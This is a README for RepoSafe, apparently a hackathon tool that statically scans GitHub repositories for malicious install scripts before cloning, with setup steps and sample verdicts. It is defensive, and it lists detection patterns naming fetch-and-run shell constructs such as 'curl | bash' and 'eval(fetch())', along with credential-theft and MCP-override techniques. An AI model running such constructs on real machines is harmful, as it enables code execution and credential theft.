AI-powered GitHub repository security scanner.
Know if a repo will attack your machine before you run a single command.
See live demonstration on Youtube: https://youtu.be/lONES6cl9dQ
Every developer workflow looks like this:
Find repository β git clone β open project
There is no safety check between those steps.
Malicious repositories can hide dangerous behavior in places developers rarely inspect:
package.jsoninstall scriptsMakefilecommands.mcp.jsonconfigurations.envexamples- install instructions in README
- GitHub Actions workflows
These scripts can:
- execute shell commands
- download malicious binaries
- exfiltrate API keys
- steal environment variables
Most security tools work after youβve already cloned and executed code.
RepoSafe adds a security check before the clone.
Paste any GitHub repository URL.
RepoSafe automatically:
package.json.mcp.jsonMakefileREADME.mdinstall.sh- GitHub workflows
Detects patterns like:
curl | bash
postinstall scripts
credential exfiltration
remote code execution
MCP server overrides
Using the GitHub API:
- repository age
- star velocity
- contributor history
- suspicious forks
Example warning:
Account created 3 days ago
847 stars gained overnight
An AI security agent analyzes:
- install instructions
- configuration files
- detected patterns
- repository metadata
and produces:
Trust Score (0-100)
Verdict
Plain-English explanation
β οΈ CLONE WITH CAUTION
Trust Score: 60/100
Findings:
π΄ Could potentially expose the application to API abuse or data leaks.
π‘ Absence of 'package.json' and limited GitHub metadata might indicate poor security practices.
π¨ DO NOT CLONE
Trust Score: 10/100
Findings:
π΄ high-severity curl-pipe-bash commands and malicious postinstall scripts.
π΄ 'package.json' contains a postinstall script that could install arbitrary code from an untrusted source
π΄ '.mcp.json' file contains an override of the MCP server URL to a suspicious host.
π΄ 'README.md' document and 'install.sh' script both contain curl-pipe-bash commands that could execute malicious payloads.
Safe repositories receive:
β
SAFE TO CLONE
| Layer | Technology |
|---|---|
| Frontend | Next.js 14 + React |
| API | Next.js Server Routes |
| AI Analysis | Groq API (Llama 3.1) |
| Data Source | GitHub REST API |
| Deployment | Vercel |
Total cost:
$0
git clone https://github.com/shivamgravity/reposafe.git
cd reposafenpm installCreate:
.env.local
Example:
GROQ_API_KEY=your_groq_api_key
GITHUB_TOKEN=optional_github_token
Where to get keys:
Groq API
https://console.groq.com/keys
GitHub Token
https://github.com/settings/tokens
npm run devOpen:
http://localhost:3000
Try scanning:
Safe repo:
https://github.com/golang/go
Suspicious demo repo:
https://github.com/shivamgravity/reposafe-demo-malicious
1οΈβ£ Push the project to GitHub
git add .
git commit -m "RepoSafe"
git push2οΈβ£ Go to:
https://vercel.com
3οΈβ£ Import your repository and add environment variables:
GROQ_API_KEY
GITHUB_TOKEN
4οΈβ£ Deploy
reposafe
β
βββ app
β βββ page.jsx
β βββ layout.js
| βββ icon.ico
β βββ api
β βββ scan
β βββ route.js
β
βββ public
β βββ banner.png
β
βββ images
β βββ Dangerous.png
β |ββ caution.png
β βββ safe.png
β
βββ package.json
βββ.gitignore
βββ package-lock.json
βββ .env.local.example
βββ README.md
RepoSafe combines multiple analysis layers.
Detects patterns like:
curl | bash
wget | sh
postinstall scripts
eval(fetch())
Flags suspicious signals:
brand new account
unusual star velocity
low contributor count
An AI model analyzes:
- install instructions
- suspicious scripts
- configuration files
to produce human-readable explanations.
RepoSafe does not execute repository code.
All analysis is performed through:
- GitHub API
- static file inspection
- AI reasoning
This ensures scanning itself is safe.
Global Engineering Hackathon
Themes:
AI
Developer Tools
Security Automation
Open-source development relies on trust.
RepoSafe adds a 10-second security check before developers clone unknown code.
A simple step that can prevent credential theft, malware, and supply-chain attacks.